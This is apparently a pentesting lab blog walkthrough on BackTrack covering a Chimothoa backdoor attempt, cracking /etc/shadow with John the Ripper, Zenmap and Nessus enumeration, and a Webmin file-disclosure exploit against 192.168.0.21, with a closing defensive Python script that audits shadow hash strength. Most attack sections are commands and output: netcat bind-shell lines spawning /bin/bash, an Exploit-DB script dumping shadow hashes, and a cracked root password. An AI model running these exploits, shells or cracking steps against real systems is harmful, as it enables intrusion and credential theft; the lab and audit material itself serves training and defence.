Chimothoa To Ubuntu Part 1

OK.
First, open Chimothoa in root/pentest/backdoors/chimothoa.

Next, open a terminal on Ubuntu and run the command ps ax.

 And now type command at Ubuntu nc -l -v -p 5353 -e > cy /bin/bash
and type command at Batrack nc -l -v -p 5353 -e > cy /bin/bash
And then I do not understand... Somebody help me?

CRACKING PASSWORDS USING JOHN THE RIPPER

OK guys.
First, copy the /etc/shadow results obtained in the earlier exercise into root/pentest/passwords/john as a .txt file.

Next open application john the ripper.


Next, run the command john -si password.txt to crack and display the passwords.


Now run the command ls to view the contents of the john folder.




Then run the commands below:

root@bt:/pentest/passwords/john# ./john --show password.txt
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > pass
root@bt:/pentest/passwords/john# ./john pass
Loaded 1 password hash (generic crypt(3) [?/32])
toor             (root)
guesses: 1  time: 0:00:00:02 DONE (Tue Jan 31 03:47:40 2012)  c/s: 36.64  trying: root - Root0
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john --show password.txt
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./john --show pass
root:toor:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left


root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > crack.db
root@bt:/pentest/passwords/john# ls
all.chr     digits.chr      genmkvpwd     john-x86-mmx      mailer        password.txt  sap_prepare.pl  unafs
alnum.chr   doc             john          john-x86-sse2     mkvcalcproba  pdf2john      sha-dump.pl     undrop
alpha.chr   dumb16.conf     john.conf     lanman.chr        netntlm.pl    rar2john      sha-test.pl     unique
calc_stat   dumb32.conf     john.log      ldif2john.pl      netscreen.py  README        ssh2john        unshadow
cmpt_cp.pl  dynamic.conf    john.pot      lion2john-alt.pl  pass          README-jumbo  stats           zip2john
crack.db    genincstats.rb  john-x86-any  lion2john.pl      password.lst  relbench.pl   tgtsnarf
root@bt:/pentest/passwords/john# cat crack.db
root:$6$LMhH9iIl$mtkH1abL22TXkpu11XTRZ27vKFPHAQySzyj4SrL6l6Uo5aLMWMS/WY7fiT9mBQN1zfSJ.mnLqnK.hJFIr5WSi0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:!:105:113::/var/lib/mysql:/bin/false
avahi:*:106:114::/var/run/avahi-daemon:/bin/false
snort:*:107:115:Snort IDS:/var/log/snort:/bin/false
statd:*:108:65534::/var/lib/nfs:/bin/false
haldaemon:*:109:117::/var/run/hald:/bin/false
kdm:*:110:65534::/home/kdm:/bin/false
festival:*:111:29::/home/festival:/bin/false
usbmux:*:112:46::/home/usbmux:/bin/false
postgres:!:1000:1000::/home/postgres:/bin/sh
privoxy:*:113:65534::/etc/privoxy:/bin/false
debian-tor:*:114:121::/var/lib/tor:/bin/bash
clamav:!:115:122::/var/lib/clamav:/bin/false

PRIVILEGE ESCALATION

OK guys.
What is privilege escalation?

Privilege escalation is an attempt to gain the privileges (access rights) of another user, either at an equal level or at a higher one such as root.



Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

  • Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications (e.g. Internet Banking users can access site administrative functions or the password for smartphone can be bypassed.)
  • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B)


 

Information Gathering and Service Enumeration

First, open Zenmap and enter the target IP address.


From the picture above we can get the host names and the operating system in use. To see the ports, click Ports/Hosts next to Nmap Output, and it will appear as below.




From the picture above we can see which services are running,
such as OpenSSH 4.6p1 on port 22 (ssh).
Here, though, we try the service on port 10000: HTTP served by MiniServ 0.01.

  

Vulnerability Assessment


For the vulnerability assessment we use Nessus. The steps are the same as I published yesterday: first log in to Nessus, click Scans, then Add, enter a name, change the policy to Internal Network Scan, enter 192.168.0.21 as the scan target and click Launch Scan.


Next, click 192.168.0.21 to see the vulnerabilities.




There we see a vulnerability point for the SSH protocol (TCP); now click ssh to see the vulnerability name.




OK, now click Download Report and open it as HTML.






The red line above shows the vulnerability that is easiest to get in through.


Exploitation and Reading /etc/shadow
OK guys, next open Exploit DB and type the commands below:

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# ls
blaCk_deviL files.csv platforms searchsploit
root@bt:/pentest/exploits/exploitdb# ls platforms
16284.rb 16381.rb 16428.rb 16475.rb 16522.rb 16569.rb 16616.rb 16663.rb 16710.rb 16761.rb 16812.rb 18108.rb
16286.rb 16382.rb 16429.rb 16476.rb 16523.rb 16570.rb 16617.rb 16664.rb 16711.rb 16762.rb 16813.rb 18109.rb
root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl
Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb# perl platforms//2017/remote/2017.pl
Can't open perl script "platforms//2017/remote/2017.pl": No such file or directory
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------


From the command perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0 we find there are 5 users with passwords.
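As an added example (not part of the original notes), here is a defender-side audit of the shadow data that both sessions above produce: the unshadow output in the John the Ripper section and the file disclosed from 192.168.0.21. It classifies each account's crypt(3) password field so an administrator can see which accounts carry a crackable hash, which still use the fast md5crypt ($1$) scheme seen in the disclosed file, and which are locked. The sample lines are constructed with dummy hash bodies, modelled on the page's listings.

```python
from collections import Counter

# Constructed sample modelled on this page's two listings (the $6$ root hash
# from unshadow on Ubuntu, the $1$ hashes in the disclosed shadow file). Hash
# bodies are dummies, not real crypt(3) output; 'guest' is added to show the
# empty-password-field case.
SAMPLE_SHADOW = """\
root:$6$LMhH9iIl$dummySha512Body:0:0:99999:7:::
daemon:*:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$dummyMd5Body:14042:0:99999:7:::
obama:$1$hvDHcCfx$dummyMd5Body:14041:0:99999:7:::
osama:$1$Kqiv9qBp$dummyMd5Body:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$dummyMd5Body:14041:0:99999:7:::
guest::14041:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm, severity). md5crypt is cheap to brute-force.
ALGORITHMS = {"$1$": ("md5crypt", "high"), "$5$": ("sha256crypt", "ok"),
              "$6$": ("sha512crypt", "ok"), "$2a$": ("bcrypt", "ok"),
              "$2b$": ("bcrypt", "ok"), "$2y$": ("bcrypt", "ok"),
              "$y$": ("yescrypt", "ok")}

def classify_hash(field):
    # Returns (status, algorithm, severity) for one shadow password field.
    if field == "":
        return "empty", None, "critical"      # account logs in with no password
    if field[0] in "!*":
        return "locked", None, "info"         # disabled, nothing for john to load
    for prefix, (name, severity) in ALGORITHMS.items():
        if field.startswith(prefix):
            return "hashed", name, severity
    if len(field) == 13 and "$" not in field:
        return "hashed", "descrypt", "high"   # legacy DES crypt, 8-char limit
    return "hashed", "unknown", "medium"

def audit_shadow(text):
    # Parse shadow/unshadow lines into one finding dict per account.
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        status, algo, severity = classify_hash(fields[1])
        findings.append({"user": fields[0], "status": status,
                         "algorithm": algo, "severity": severity})
    return findings

def crackable_accounts(findings):
    # Accounts a cracker would load: a real hash or an empty password field.
    return [f["user"] for f in findings if f["status"] != "locked"]

def severity_counts(findings):
    return Counter(f["severity"] for f in findings)
```

Running audit_shadow on the sample reports six accounts that need attention: the md5crypt users should have their passwords rehashed under sha512crypt or yescrypt (and rotated, since the file was disclosed), and the empty field should be locked.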